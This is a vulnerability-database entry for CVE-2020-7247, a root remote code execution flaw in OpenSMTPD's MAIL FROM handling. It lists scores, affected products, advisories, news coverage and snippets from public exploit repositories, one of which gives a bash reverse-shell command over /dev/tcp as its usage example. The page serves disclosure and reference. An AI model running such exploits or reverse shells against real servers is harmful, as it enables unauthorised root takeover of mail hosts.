CVE-2020-7247

Published: 29/01/2020 Updated: 07/11/2023
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 893
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote malicious users to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.

Vulnerable Product

openbsd opensmtpd 6.6

debian debian linux 9.0

debian debian linux 10.0

fedoraproject fedora 32

canonical ubuntu linux 18.04

canonical ubuntu linux 19.10

Vendor Advisories

OpenSMTPD could be made to run programs as root if it received specially crafted input over the network ...
Qualys discovered that the OpenSMTPD SMTP server performed insufficient validation of email addresses, which could result in the execution of arbitrary commands as root. In addition, this update fixes a denial of service by triggering an opportunistic TLS downgrade. For the oldstable distribution (stretch), these problems have been fixed in version 6 ...
A vulnerability was discovered in OpenSMTPD before version 6.6.2 which allows arbitrary code execution by constructing a mail FROM address that escapes the regex filter ...

Exploits

Qualys discovered a vulnerability in OpenSMTPD, OpenBSD's mail server. This vulnerability is exploitable since May 2018 (commit a8e222352f, "switch smtpd to new grammar") and allows an attacker to execute arbitrary shell commands, as root ...
smtp_mailaddr in smtp_session.c in OpenSMTPD version 6.6, as used in OpenBSD version 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an inco ...
smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell meta-characters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return va ...
OpenSMTPD version 6.6.2 remote code execution exploit ...

Mailing Lists

Full Disclosure mailing list archives: LPE and RCE in OpenSMTPD (CVE-2020-7247) From: Qualys Security ...
oss-sec mailing list archives: LPE and RCE in OpenSMTPD (CVE-2020-7247) From: Qualys Security Advisory ...

Github Repositories

OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution PoC exploit

CVE-2020-7247-exploit OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution PoC exploit Reference: www.openwall.com/lists/oss-security/2020/01/28/3 Usage python3 exploit.py <target_host> <target_port> <reverse_host> <reverse_port> <recipient_email> Dependencies pip3 in

Python exploit of cve-2020-7247

cve-2020-7247-exploit Python exploit of cve-2020-7247 Read about the vulnerability: blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/

Proof Of Concept Exploit for CVE-2020-7247 (Remote Execution on OpenSMTPD < 6.6.2)

CVE-2020-7247 Proof Of Concept Exploit for CVE-2020-7247 (Remote Execution on OpenSMTPD < 6.6.2) OpenSMTPD < 6.6.2 www.cvedetails.com/cve/CVE-2020-7247 tested on: OpenBSD 6.6 credits to Marco Ivaldi raptor@0xdeadbeef.info for payload Usage (remote) $ go run CVE-2020-7247.go -u 19216802 -p 25 -d example.org [change nc listener in source code if you are n

PoC exploit for CVE-2020-7247 OpenSMTPD 6.4.0 < 6.6.1 Remote Code Execution

CVE 2020-7247 PoC exploit for OpenSMTPD 6.4.0 < 6.6.1 - Remote Code Execution, written by f4T1H, inspired by QTranspose Reference: www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt Dependencies: pip3 install pwntools Usage: python3 exploit.py <RHOST> <RPORT> <recipient_mail

Proof of concept for CVE-2020-7247 for educational purposes.

Foreword Key facts about the exploit Installing the vulnerable server Configuration Environment disclaimers Exploit Manual Exploitation Scripted Exploitation Foreword This repository should serve as a base to set up and exploit CVE-2020-7247 in a controlled and private environment. All of the published code and configuration is solely meant for testing this vulnerability

smtp exploit script

SMTPython smtp exploit script CVE-2020-7247 RemoteCodeExecution usage: ./SMTPython.py name@host example: ./SMTPython.py 19216804 25 'bash -c "exec bash -i &> /dev/tcp/1921681104 4444 <&1"' user@ubuntu

OpenSMTPD version 6.6.2 remote code execution exploit

cve-2020-7247 Exploit Title: OpenSMTPD 6.6.2 - Remote Code Execution The new Date: 2020-01-29 Exploit Author: 1F98D Original Author: Qualys Security Advisory Vendor Homepage: www.opensmtpd.org/ Software Link: github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1 Version: OpenSMTPD < 6.6.2 Tested on: OpenBSD 6.6, OpenBSD 6.5, OpenBSD 6.4, OpenBSD 5.9

Terraform script to deploy vulnerable pentest lab on AWS.

Private Pentest Lab on AWS Terraform script to deploy below vulnerable container targets on AWS Juice-shop: hub.docker.com/r/bkimminich/juice-shop DVWA: hub.docker.com/r/vulnerables/web-dvwa XVWA: hub.docker.com/r/bitnetsecdave/xvwa Vulnerable Graphql: Damn-Vulnerable-GraphQL-Application Vulnerable API: github.com/erev0s/VAmPI Vulnerable SMB: ht

Hack The Box writeups by Şefik Efe.

Hack The Box Writeups by Şefik Efe. Would you like to give me stars in Hack The Box? Thanks in advance :) I'll be posting retired boxes' and some challenges' writeups. You can search keywords and/or topics between writeups using top left corner search bar. Index Table My favourite writeup so far: Breadcrumbs

Recent Articles

Anatomy of OpenBSD's OpenSMTPD hijack hole: How a malicious sender address can lead to remote pwnage
The Register • Shaun Nichols in San Francisco • 30 Jan 2020

Function accidentally returns OK instead of no-way

Code dive The OpenBSD project's OpenSMTPD can be potentially hijacked by a maliciously crafted incoming email. Infosec biz Qualys discovered and this week disclosed CVE-2020-7247, a root privilege-escalation and remote code execution flaw in OpenSMTPD. It can be exploited locally by a normal user to execute shell commands as root, if using the daemon's default configuration, or locally and remotely if the daemon is using its "uncommented" default configuration, in which it listens on all interfa...